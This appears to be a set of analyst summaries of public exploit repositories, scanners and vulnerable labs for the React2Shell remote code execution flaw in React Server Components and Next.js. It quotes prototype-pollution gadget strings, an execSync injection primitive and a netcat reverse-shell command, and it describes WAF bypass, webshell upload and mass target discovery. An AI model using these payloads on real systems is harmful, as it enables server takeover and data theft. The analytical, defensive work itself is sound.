Rejected duplicate CVE for downstream Next.js exposure to React2Shell

This repository is a minimal two-file proof-of-concept for CVE-2025-66478. The README describes the issue as unsafe handling of React Server Components / Next.js payloads leading to unintended code execution in certain configurations. The only code file, exploit.py, does not directly implement the network exploit itself; instead, it acts as a wrapper around another local script, defaulting to `CVE-2025-66478.py`, which is expected to perform the actual exploitation. The wrapper launches that PoC as a subprocess, feeds it the target URL and a command over stdin, parses returned output using a regex looking for an `OUTPUT BELOW:` marker, and presents the result to the operator. Operationally, exploit.py provides an interactive pseudo-shell for remote command execution. It accepts a required target URL (`-u/--url`) and an optional PoC script path (`-p/--poc`). It maintains a client-side notion of the remote current working directory, initialized to `/`, and supports `cd` by issuing a test command that changes directory remotely and runs `pwd`. For all other input, it prepends `cd <cwd>` before the user command so subsequent commands execute relative to the tracked directory. This indicates the intended capability is arbitrary command execution on a vulnerable web application backend. No hardcoded remote URLs, IPs, domains, or HTTP paths are present in the provided code. The only fingerprintable values are local file references and the root directory `/`. Because the actual exploit transport and endpoint logic are delegated to the missing `CVE-2025-66478.py`, the repository as provided is incomplete but still clearly exploit-oriented rather than a detector. Its maturity is best classified as POC: it offers interactive RCE workflow, but the core exploit implementation is absent from the analyzed contents and payloading is limited to operator-supplied shell commands.

This repository is a small standalone Python exploit PoC for CVE-2025-55182, with README documentation, one executable script, and a minimal requests dependency. The main file, cve-2025-55182.py, is the sole code artifact and acts as the entry point. It is not part of a larger exploit framework. The exploit targets vulnerable React Server Components / Next.js Server Actions deployments over HTTP(S). It builds a crafted multipart/form-data POST body that abuses the RSC wire protocol using a poisoned object with __proto__ pollution, constructor.constructor access, and a malicious _prefix JavaScript expression. The injected JavaScript executes synchronously on the server, uses Node.js child_process.execSync to run arbitrary OS commands, Base64-encodes stdout, and throws a forged NEXT_REDIRECT error so the application returns the output inside the x-action-redirect header. The script then parses either x-action-redirect or Location for the ?a= parameter, URL-decodes it, and Base64-decodes it for display. Capabilities include single-command execution (-c) and an interactive pseudo-shell (--shell), though the shell is stateless and sends one HTTP request per command. The operator can also override the Host header for virtual-hosted targets, set request timeouts, and enable verbose output to inspect raw response headers. There is no reverse shell, persistence, or callback infrastructure; exfiltration is entirely in-band via the HTTP response headers. Repository structure is simple: README.md provides vulnerability background, affected versions, usage examples, and references; requirements.txt lists requests>=2.28.0; .gitignore excludes Python artifacts and lab files. Overall, this is an operational but lightweight exploit script intended to demonstrate pre-authenticated RCE against vulnerable Node.js-based Next.js/React Server Components applications.

This repository is a small standalone Python proof-of-concept exploit for CVE-2025-55182, with README references also tying the issue to Next.js as CVE-2025-66478. The repository contains three files: a single exploit script (CVE-2025-55182.py), a README with usage/examples, and an MIT license. The Python script is the sole code file and main entry point. The exploit sends a crafted HTTP POST request using the requests library to an operator-supplied URL. It sets custom headers including Host: localhost, Next-Action: x, and a fixed multipart/form-data boundary. The POST body embeds a malicious serialized structure designed to trigger unsafe server-side behavior in React Server Components processing. The key execution primitive is injected into the _prefix field as JavaScript: process.mainModule.require('child_process').execSync('<command>');, which attempts to execute an arbitrary shell command on the target Node.js server. Capabilities are straightforward but dangerous: remote arbitrary command execution against a vulnerable server-side React/Next.js deployment. The script accepts a target URL and optional command-line command parameter; if omitted, it defaults to 'id'. It prints the target, command, and HTTP status code, but does not implement output retrieval, session handling, or advanced exploitation logic. Because it includes a usable hardcoded RCE primitive and supports arbitrary operator-supplied commands, it is more than a detection script but still a relatively simple PoC/operational exploit. No exploit framework is used. There is no persistence, privilege escalation, or lateral movement logic in the repository. The README includes an example reverse-shell command using netcat (nc 10.0.2.4 4444 -e sh), indicating intended post-exploitation use, but the exploit itself only delivers command execution and leaves payload selection to the operator.

This repository is a real exploit project centered on exploit/react2shell.py, a standalone Python exploit for CVE-2025-55182 affecting React Server Components in vulnerable React/Next.js deployments. The repository also includes extensive markdown analysis, a deliberately vulnerable Next.js lab application, an auxiliary curl-based exploit script, and a restoration script for resetting the lab after destructive testing. The main exploit is not merely a detector: it builds a malicious multipart/form-data request that targets Next.js Server Action / React Flight deserialization. The payload abuses prototype pollution ("$1:__proto__:then") and constructor traversal ("$1:constructor:constructor") to reach the JavaScript Function constructor, then executes attacker-controlled JavaScript in the Node.js process. That JavaScript invokes child_process.execSync() to run arbitrary shell commands. Command output is exfiltrated by throwing a NEXT_REDIRECT error whose digest is converted by Next.js into the X-Action-Redirect response header, typically embedding output in a /login?a=... redirect value. Capabilities described and partially visible in the code/docs include: vulnerability checking with a benign echo command, arbitrary command execution, interactive shell mode, environment-variable theft using a temp file and line-by-line reads to bypass header-size limits, website defacement, deletion of project/dashboard content, and server shutdown/DoS actions. This makes the exploit operational rather than a simple PoC. Repository structure: - exploit/react2shell.py: primary exploit implementation in Python using requests and argparse. - exploit/exploit-explanation.md: usage and architecture documentation. - docs/analysis/*.md: root-cause analysis, payload anatomy, and disclosure timeline. - vulnerable-app/: intentionally vulnerable Next.js 15.0.0 + React 19.0.0 demo target. - vulnerable-app/curl_id.sh: bash/curl variant of the exploit. - vulnerable-app/scripts/restore.sh: lab restoration helper. Fingerprintable observables include the target root path /, local demo URL http://localhost:3000, required headers Next-Action / X-Nextjs-Request-Id / X-Nextjs-Html-Request-Id, response header X-Action-Redirect, exfiltration redirect path /login?a=${res}, and temp file /tmp/stolen_env.txt. The vulnerable app itself exposes a server action in vulnerable-app/app/actions.ts and a client page in app/page.tsx, but the vulnerability is in the underlying React/Next.js deserialization path rather than in custom application logic.

Repository purpose: an educational proof-of-concept Next.js application branded as an “interactive code playground” that provides a server-side code execution API, demonstrating claimed CVEs (CVE-2025-55182 / CVE-2025-66478) affecting React Server Components / Next.js. Structure (6 files): - Dockerfile: builds a Node 20 Alpine container, installs dependencies, runs `next dev`, exposes port 3000. - package.json: pins `next` to 15.0.0 (described as vulnerable) with React 18.2.0. - pages/api/rce.js: core vulnerable component. Implements a Next.js API route that accepts POST JSON `{ code: string }` and executes it using `eval()` and `new Function()` depending on simple heuristics. Returns JSON with `success`, `result`, `resultType`, timestamp, and code length; returns eval errors as `success:false`. - pages/index.js: large frontend UI that calls `fetch('/api/rce')` to submit code and renders the returned JSON/error to the page. - README.md / LICENSE: documentation, disclaimers, Docker run instructions, and patch guidance. Exploit capability: network-accessible RCE via the `/api/rce` endpoint. Any remote user who can reach the service can submit arbitrary JavaScript for execution in the server’s Node.js context. CORS is set to `*`, enabling cross-origin browser-based triggering as well. No authentication, sandboxing, or allowlist is present, so the endpoint effectively provides arbitrary code execution and can be extended to filesystem/network actions through Node APIs.

This repository is a containerized CTF lab demonstrating React2Shell (CVE-2025-55182) / downstream Next.js issue (CVE-2025-66478): unsafe deserialization in the React Server Components (Flight) protocol used by Next.js Server Actions. Repository structure/purpose: - Dockerized vulnerable Next.js App Router storefront ("Quantum Supplies") under /app, pinned to next@16.0.6 and react/react-dom@19.2.0. The Dockerfile creates a readable flag at /flag/flag.txt and runs the app on port 3000 (exposed as localhost:10001 via docker-compose). - Vulnerable surface is not custom business logic; it is the framework’s parsing of Server Action multipart Flight payloads. The app includes typical server actions (register/login/addToCart/removeFromCart/checkout/removeOrder) in app/actions/serverActions.js; the checkout action is highlighted as the intended trigger point. - /documents and /solution contain extensive writeups explaining the Flight payload structure, prototype/property injection primitives (e.g., $1:__proto__:then and $1:constructor:constructor), and how to exfiltrate command output using a crafted NEXT_REDIRECT digest. - solution/solve.py is the operational exploit driver: it runs curl to POST a crafted multipart/form-data body with a Next-Action header to http://localhost:10001/login (any Server Action-routed endpoint works in the lab), injecting JavaScript into the deserialization context via _response._prefix. The injected code executes OS commands through Node’s child_process.execSync (specifically `cat /flag/flag.txt`) and forces Next.js to return the output by throwing a NEXT_REDIRECT error that embeds the result in /login?a=... . Exploit capabilities: - Network-based pre-auth style RCE (as described in docs) by sending a malicious React Flight multipart payload to a Server Actions endpoint. - Arbitrary command execution in the Node.js runtime (execSync), demonstrated by reading a local file (/flag/flag.txt) and returning it to the attacker. - Output exfiltration via Next.js redirect/digest behavior rather than needing an out-of-band channel. Notable implementation details: - next.config.mjs sets experimental.serverActions.allowedOrigins to ["*"], which is permissive and relevant to cross-origin invocation scenarios, though the core issue is the deserializer vulnerability. - The Next-Action header value is build-specific; solution docs note it changes after rebuilds, requiring re-capture from a legitimate request.

Repository implements a Firefox (Manifest v3-style) extension named "RSC Sentinel" aimed at detecting and optionally probing/exploiting "React2Shell"-style issues in React Server Components / Next.js App Router applications (README cites CVE-2025-55182 and CVE-2025-66478). Structure & roles: - manifest.json: Declares permissions (activeTab, scripting, declarativeNetRequest) and host_permissions <all_urls>, loads content.js on all pages at document_idle, and enables rules.json. - content.js (core): Performs (1) passive scanning for RSC/App Router indicators, (2) active fingerprint probing (user-initiated), (3) WAF detection via header/body signature heuristics (Cloudflare, AWS, Akamai, Fastly, Imperva, Sucuri, F5, Barracuda, Vercel, Azure, Google Cloud Armor), and (4) a user-driven exploit routine that sends a crafted request containing a command and attempts to extract a "digest" field from the response, base64-decodes it, and returns the decoded output to the popup. - popup.html + popup.js: UI to display passive signals, run the fingerprint probe, and submit a command (default "whoami") for execution; also supports a WAF-bypass toggle and shows detected WAF vendor. - background.js: Sets a red "!" badge when detection/exploit success is reported. - rules.json: Modifies outbound XHR headers globally (sets a fixed Referer and removes Origin), which can affect server-side CSRF/origin checks and may help with certain bypass scenarios. Capabilities (actionable): - Passive detection: highlights likely RSC/Next.js App Router presence without changing site behavior. - Active probing: sends a controlled fingerprint request to elicit RSC-specific responses. - Manual command execution: sends a user-provided command to the current site and displays returned output if the target responds with an expected "digest" value; includes optional WAF-bypass behavior and WAF fingerprinting. No hardcoded external C2 infrastructure is present; network activity is directed at the currently visited site (all URLs) and relies on the target application’s endpoints/behavior.

Repository contains a minimal Python proof-of-exploit for a “React2shell” chain referencing CVE-2025-55182 + CVE-2025-66478. Structure: - README.md: one-line description of the CVE chain. - exploit.py: standalone Python script (requests-based) that performs a single HTTP POST to a target base URL. Exploit behavior/capabilities: - Takes `BASE_URL` from argv[1] (default `http://localhost:3000`) and a command from argv[2] (default `calc`). - Crafts a multipart/form-data body with two parts (`files` keys "0" and "1"). Part "0" is JSON containing a specially shaped object (`crafted_chunk`) that includes: - Prototype/thenable manipulation fields (e.g., `"then": "$1:__proto__:then"`, `"value": '{"then": "$B0"}'`) consistent with a deserialization/prototype-pollution style gadget. - An `_response._prefix` string that is intended to be evaluated in a Node/Next.js server context; it calls `child_process.execSync(<command>, timeout=5000)`. - A follow-on technique to surface command output by throwing an Error('NEXT_REDIRECT') with a `digest` property containing the command output. - Sends the request with header `Next-Action: x` to force Next.js server-action handling. - Prints HTTP status code and response text, which may include the embedded command output if exploitation succeeds. No additional infrastructure (C2, callbacks, hardcoded external IPs/domains) is present; the only network interaction is the single POST to the provided base URL.

Repository purpose: an intentionally vulnerable Next.js/React Server Components lab environment for testing detection/exploitation of the React2Shell RCE (CVE-2025-55182) and downstream Next.js impact (CVE-2025-66478). Key capabilities: - Provides a runnable vulnerable web app (Next.js App Router) pinned to next@16.0.6 and react/react-dom@19.2.0. - Includes a Nuclei template (nuclei-template/CVE-2025-55182.yaml) that performs an unauthenticated RCE check by sending a crafted multipart/form-data POST to "/" with Next.js RSC/Server Action headers. The payload executes a command (Linux: echo arithmetic; Windows: PowerShell arithmetic) via Node.js child_process.execSync and verifies exploitation by matching the resulting redirect header (x-action-redirect to /login?a=<result>). - README documents a manual PoC payload that executes `id` and returns output in the response digest. Repository structure: - app/layout.jsx, app/page.jsx: minimal Next.js UI explaining the vulnerable components and references. - package.json / next.config.mjs: pins vulnerable dependencies and minimal config. - Dockerfile: builds and runs the app on port 3000 (dev mode) inside a Node 20 container. - nuclei-template/CVE-2025-55182.yaml: primary exploit/detection artifact (Nuclei). - docker.sh and install-docker.sh: helper scripts to install Docker/Docker Compose on Ubuntu (environment setup, not part of exploitation). Overall: this is primarily a PoC/vulnerable testbed plus a scanner template, not a full weaponized exploit framework; it demonstrates pre-auth network RCE via unsafe deserialization in the RSC/Server Action request handling path.

This repository contains a Go-based proof-of-concept exploit and scanner for two Next.js server-side RCE vulnerabilities (CVE-2025-55182 and CVE-2025-66478). The main file, react2shell.go, implements a high-concurrency scanner that can target a single domain or a list of domains, optionally using Subfinder to enumerate subdomains. The exploit crafts a multipart/form-data POST request with a JavaScript payload that leverages a backtick-encoded command injection to trigger code execution on the server. The tool checks for successful exploitation by inspecting the 'X-Action-Redirect' header in the HTTP response for the expected command output. The repository is structured with a single Go source file and a README, and is intended for security testing and research purposes.

This repository contains a Python-based exploit toolkit ('React2Shell') targeting a critical remote code execution (RCE) vulnerability (CVE-2025-66478) in Next.js applications using React Server Components (RSC). The exploit leverages prototype pollution and a React.lazy(-1) gadget chain to achieve arbitrary command execution via Node.js's child_process.execSync. The toolkit automates detection of vulnerable targets, exploitation, and post-exploitation activities such as interactive shell access, file upload (including PHP webshells), and file read. It includes advanced features for bypassing web application firewalls (WAFs) using junk data, Unicode encoding, and header manipulation. The main entry point is 'main.py', which provides a command-line interface for scanning, exploitation, and shell interaction. The toolkit exfiltrates command output via HTTP redirects to endpoints like '/exploit?out=<output>'. The README files provide detailed usage instructions, supported commands, and post-exploitation techniques. The exploit is operational, providing a working payload and interactive shell, and is intended for authorized penetration testing of Next.js applications vulnerable to this specific RSC attack chain.

This repository provides a professional Python-based scanner and exploitation tool for CVE-2025-66478, a critical RCE vulnerability in Next.js applications using React Server Components. The main script, 'react2shell-ultimate.py', implements multiple scanning modes: safe detection, RCE proof-of-concept, version detection, and comprehensive scanning with WAF bypass techniques. It supports batch scanning, JSON output, and advanced exploitation features such as 'God Mode', which allows interactive shell access and file reading on vulnerable targets. The tool is operational and can be used for both detection and exploitation, not just as a POC. The 'menu.py' script provides an interactive menu interface for automating scans and managing results. The README documents usage, features, and legal disclaimers, and points to a professional web interface and API. The tool targets Next.js (primarily versions 15.x and 16.x before patching) and is intended for authorized security testing. No hardcoded IPs or domains are used for exploitation; the user supplies the target URL. The codebase is clean, modular, and leverages standard Python libraries and requests/tqdm for HTTP and progress handling.

This repository provides a full proof-of-concept (PoC) and operational exploit for CVE-2025-55182 (and CVE-2025-66478), a critical remote code execution (RCE) vulnerability affecting Next.js (15.x, 16.x App Router), React Core (19.0.0 to 19.2.0), and react-server-dom-webpack (19.0.0 to 19.2.0) running on Node.js >=20.9.0. The repository is structured into two main components: 1. 'cve-2025-55182-target/' is a sample vulnerable Next.js application, configured with the affected versions, for local testing and demonstration purposes. 2. 'react2shell/' contains the actual exploit tools: - 'scanner.py' is a high-fidelity scanner for detecting the vulnerability, supporting both single and multi-target scanning, custom headers, safe (non-RCE) detection, WAF bypass, and Windows payloads. - 'scanner_with_rce.py' extends the scanner to perform actual remote code execution, allowing arbitrary commands to be run on the target server. Both scripts are written in Python and use multipart/form-data POST requests with a crafted payload that exploits the RSC deserialization flaw, resulting in command execution via Node.js child_process. - 'assets/poc.http' provides a raw HTTP request example for manual testing. The exploit works by sending a specially crafted POST request to the root (or redirected) path of the target Next.js application. If successful, the output of the executed command is returned in the X-Action-Redirect response header. The exploit scripts support various operational modes, including safe detection, WAF bypass, and Windows compatibility. The repository is not part of a framework and is a standalone PoC/exploit. The main attack vector is network-based, targeting HTTP(S) endpoints exposed by vulnerable Next.js servers.

This repository is a comprehensive exploitation toolkit for CVE-2025-55182 and CVE-2025-66478, critical unauthenticated RCE vulnerabilities in React Server Components and Next.js. The toolkit includes: - A Nuclei template (cve-2025-55182.yaml) for automated detection and exploitation, sending crafted POST requests to '/' and '/_next/data' endpoints to trigger unsafe deserialization and prototype pollution, resulting in remote code execution. The template uses mathematical validation to confirm successful exploitation. - A Bash script (scanner_advanced (1).sh) providing an interactive CLI for scanning and exploiting single or multiple targets, supporting custom commands and output options. - A Python script (shodan_scanner_advanced (1).py) for discovering potentially vulnerable targets via Shodan, supporting batch scanning and JSON reporting. - A requirements file for Python dependencies. - A detailed README describing the vulnerabilities, affected versions, usage instructions, and references. The main attack vector is network-based, targeting HTTP(S) endpoints exposed by vulnerable React or Next.js servers. The exploit does not require authentication and can result in full system compromise. The toolkit is operational, providing both detection and exploitation capabilities, and is suitable for red team and authorized security testing.

This repository provides a proof-of-concept (PoC) and testing lab for CVE-2025-55182 (React Server Components RCE) and the related Next.js downstream CVE-2025-66478. The main exploit is implemented as a Nuclei template (nuclei-template/CVE-2025-55182.yaml), which sends a crafted HTTP POST request to the root endpoint (/) of a vulnerable Next.js/React RSC application. The payload leverages unsafe deserialization in the RSC 'Flight' protocol, resulting in unauthenticated remote code execution via Node.js child_process. The exploit demonstrates successful code execution by redirecting the user to /login?a=<result>, where <result> is the output of a system command (multiplication of two random numbers). The repository also includes a Dockerfile and Next.js application code to set up a vulnerable environment for testing. The PoC is operational and suitable for both detection and exploitation in a controlled lab. No hardcoded IPs or external domains are present; all exploitation is performed via HTTP requests to the local or target server.

This repository is a Go-based GUI tool for exploiting remote code execution (RCE) vulnerabilities in Next.js applications, specifically targeting CVE-2025-55182 and CVE-2025-66478. The tool provides a user-friendly interface (built with the Fyne GUI library) that allows users to specify a target URL and endpoint, configure payload encoding/encryption options, and execute arbitrary system commands or JavaScript code on the target server. It supports advanced features such as file management (read/write), module loading, and various payload obfuscation techniques (Unicode, UTF-16LE, AES encryption) to bypass WAFs. The main logic resides in 'pkg/core/exploit.go', which crafts and sends multipart/form-data POST requests with malicious payloads to the target endpoint. The GUI in 'pkg/gui/window.go' orchestrates user input and displays results. The tool is operational and provides real exploitation capabilities, not just detection. No hardcoded IPs or domains are present; the user supplies the target. The tool is cross-platform and can be used on Windows, macOS, or Linux.

This repository contains a proof-of-concept (PoC) exploit for CVE-2025-66478 (also referenced as CVE-2025-55182), a critical remote code execution (RCE) vulnerability in Next.js applications using React Server Components (RSC). The exploit leverages prototype pollution via a crafted multipart/form-data POST request to inject a malicious payload into the server's RSC serialization process. This results in arbitrary command execution on the server using Node.js's child_process.execSync. The main exploit script (CVE-2025-66478.py) is an interactive Python CLI that prompts the user for a target URL and a command to execute. It constructs the malicious payload, sends it to the specified endpoint, and parses the response to display the command output. The repository is structured with a single Python exploit script and a detailed README.md explaining the vulnerability, usage instructions, and example output. No hardcoded endpoints are present; the target URL is supplied by the user at runtime. The exploit is a functional PoC and does not include weaponization or automation for mass exploitation.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-55182 and CVE-2025-66478, which are critical unauthenticated remote code execution (RCE) vulnerabilities in Next.js (versions 15.x, 16.x, and 14.3.0-canary.77+) when used with vulnerable versions of React (19.0.0, 19.1.0, 19.1.1, 19.2.0). The exploit leverages prototype pollution and the React Flight Protocol's deserialization process to achieve arbitrary code execution on the server. The main exploit is implemented in 'poc.py', a Python script that sends a specially crafted multipart POST request to the target Next.js server. The payload abuses the server's deserialization logic to execute arbitrary shell commands, with the command output returned in the HTTP response. The repository also includes a minimal vulnerable Next.js application (app/layout.js, app/page.js, package.json) for local testing. The exploit does not require authentication and can be used to run any command, including spawning a reverse shell. The repository is structured as a PoC for security researchers and red teamers to demonstrate the impact of the vulnerability.

This repository provides a comprehensive exploit and scanning toolkit for CVE-2025-55182 and CVE-2025-66478, which are critical unauthenticated remote code execution (RCE) vulnerabilities in React Server Components (RSC) and Next.js. The exploit leverages prototype pollution and unsafe deserialization in the React Flight protocol, allowing attackers to execute arbitrary JavaScript on the server, which is then used to run system commands via Node.js's child_process module. The repository includes: - High-fidelity scanner scripts (react2shell-scanner, cve-2025-66478-web-scan) for detection and mass scanning, supporting safe detection and full RCE verification. - A weaponized exploit script (test-lab/exploit.py) capable of executing arbitrary commands or establishing a reverse shell on vulnerable targets. - IOC databases (payloads-exploits/*.csv) with known malicious IPs, C2s, and exfiltration endpoints observed in the wild. - A Docker-based test lab with both vulnerable and patched Next.js applications for safe local testing. - Multiple payload examples, including those for exfiltration and malware delivery, with endpoints for C2 and data theft. The exploit is operational and can be used for both detection and full exploitation, including file read, command execution, and reverse shell. The attack vector is network-based, requiring only HTTP(S) access to the target. The toolkit is suitable for red team operations, vulnerability research, and blue team detection rule development. The repository is well-documented, with guides for setup, usage, and integration with security platforms.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-66478, a critical remote code execution (RCE) vulnerability in Next.js (App Router) due to insecure deserialization and prototype pollution in the React Server Components (RSC) Flight protocol. The repository contains a minimal vulnerable Next.js application (in the 'app' directory) and a Node.js exploit script ('exploit.mjs'). The exploit script connects to a target Next.js server, discovers a required action ID, and sends a specially crafted multipart/form-data POST request that pollutes Object.prototype with a malicious 'then' property. This causes the server to treat attacker-controlled objects as Promises, leading to the execution of arbitrary JavaScript code (including system commands via child_process.execSync) on the server. The exploit provides an interactive shell for executing arbitrary commands remotely. The default endpoint is 'http://localhost:3000', but this can be changed. The repository is well-documented, with both English and Chinese readmes, and is intended for research and educational purposes only.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-55182, a remote code execution (RCE) vulnerability in React Server Components and Next.js applications. The main exploit script, 'react2shell-scanner.py', is a Python 3 tool that allows a user to specify a target URL and (optionally) multiple paths to probe for the vulnerability. The tool sends specially crafted HTTP POST requests with multipart/form-data payloads to exploit the vulnerability, allowing arbitrary OS command execution on the target server. It supports several features, including WAF bypass techniques (junk multipart fields, Vercel-specific tweaks), safe check mode (for detection without exploitation), custom headers, TLS options, and JSON output. The tool is single-host focused and intentionally disables mass scanning features. The README provides detailed usage instructions, examples, and legal disclaimers. The repository is structured with a single main exploit script, a requirements file for dependencies, and documentation. No hardcoded IPs or domains are used for exploitation, but example and default endpoints are provided. The exploit is intended for educational and authorized testing only.

This repository contains an advanced exploit and scanner for two critical vulnerabilities (CVE-2025-55182 and CVE-2025-66478) affecting Next.js applications using React Server Components (RSC). The main exploit logic is implemented in 'react2shell.py', a Python script that can scan single or multiple targets for RCE vulnerabilities and, if found, exploit them by executing arbitrary commands on the server. The tool supports both Linux and Windows targets, with payloads crafted for each OS. It features WAF bypass techniques, multi-threaded scanning, and both detection and exploitation modes. The README provides detailed usage instructions, including command-line options for specifying targets, commands, output files, and operational modes. The only endpoints directly referenced are user-supplied target URLs (via command-line or file input). The repository is operational-grade and suitable for both vulnerability assessment and exploitation in authorized security testing contexts.

This repository contains 'next88', a high-performance Go-based scanner and exploit tool targeting React Server Components RCE vulnerabilities (CVE-2025-55182 and CVE-2025-66478) in Next.js applications. The main logic resides in 'main.go', which implements concurrent scanning of single or multiple hosts, supports various payloads for both Unix and Windows targets, and includes advanced WAF bypass techniques (junk data, double encoding, semicolon insertion, and Vercel-specific payloads). The tool can perform both safe (side-channel) and direct RCE PoC checks, detect source code exposure via ACTION_ID extraction, and output results in JSON format. It also supports real-time notifications via Discord webhooks. The README provides comprehensive usage instructions, including command-line options for custom paths, output formats, and integration with the AutoAR project. The Makefile and setup documentation facilitate easy building and integration. The tool is operational and suitable for both vulnerability detection and exploitation in real-world scenarios.

This repository, 'react2shell', is a Rust-based CLI tool designed to exploit critical prototype pollution vulnerabilities (CVE-2025-55182, CVE-2025-66478) in React Server Components and Next.js Server Actions. The exploit targets specific versions of Next.js (15.x, 16.x, 14.3.0-canary.77+) and React (19.x) packages, enabling remote code execution (RCE) on affected servers. The tool provides two main functionalities: (1) opening an interactive shell to execute arbitrary commands or JavaScript on a single target, and (2) scanning multiple targets for vulnerability, logging successful exploits to a results file. The exploit works by sending a specially crafted JSON payload via a multipart POST request to the target, abusing prototype pollution to inject code that is executed server-side using Node.js 'child_process'. The repository is structured with Rust source code in the 'src/' directory, a sample vulnerable Next.js app in 'lab/', and supporting configuration files. The main entry point is 'src/main.rs', which parses CLI arguments and dispatches to either exploit or scan mode. The exploit logic is implemented in 'src/exploit.rs', and interactive shell features are in 'src/prompt.rs'. No hardcoded IPs or domains are present; the tool is designed to be used against user-specified targets. The attack vector is network-based, requiring HTTP(S) access to the vulnerable server. The payload is operational, providing a working shell and command execution capabilities, but is not part of a larger exploitation framework. The repository includes clear documentation, legal disclaimers, and mitigation advice.

This repository provides a comprehensive educational and operational exploit for CVE-2025-55182 / CVE-2025-66478, a critical unauthenticated RCE in React Server Components and Next.js (16.0.6, React 19.x). The exploit leverages a missing hasOwnProperty check in the React Flight protocol deserializer, allowing prototype pollution and arbitrary code execution via crafted HTTP POST requests. The main exploit scripts are 'exploit_educational.sh' (detailed, with step-by-step explanations and detection) and 'quick_exploit.sh' (automated exploitation and flag extraction). The repository also includes extensive documentation (README.md, TEAM_LEARNING_GUIDE.md) explaining the vulnerability, exploitation chain, and mitigation. The exploit is operational, providing both detection and full RCE capabilities, and is designed for educational and authorized security testing purposes. No hardcoded IPs or domains are present; the scripts require the user to specify the target URL. The main attack vector is network-based, targeting HTTP endpoints exposed by vulnerable Next.js/React servers.